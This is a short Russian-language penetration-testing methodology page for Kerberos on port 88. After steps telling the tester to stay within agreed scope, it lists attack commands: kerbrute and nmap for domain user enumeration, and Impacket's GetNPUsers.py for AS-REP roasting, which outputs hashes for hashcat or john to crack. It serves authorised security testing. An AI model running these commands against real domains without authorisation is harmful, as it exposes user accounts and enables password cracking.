88 — Kerberos

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

1. Убедитесь, что целевой сервис и порт входят в согласованный scope.
2. Выполните перечисление: версия, баннеры, доступные команды и скрипты.
3. Проверьте типовые слабости и сценарии из раздела, документируя каждый шаг.
4. Команды в блоках кода используйте без перевода синтаксиса.

Методика

Obtain domain users

kerbrute userenum --dc <IP_DC> -d <DOMAIN> <USERS_WORDLIST> sudo nmap -p 88 --script=krb5-enum-users --script-args "krb5-enumusers.realm='<domain>'",["userdb=<USERNAMES.TXT>"] <IP>

AS-REProasting attack

GetNPUsers.py <domain_name>/ -usersfile <USERNAME.txt> -format {hashcat | john} -outputfile <output_AS_REP_responses_file> -dc-ip <DC_IP>

Ссылки

---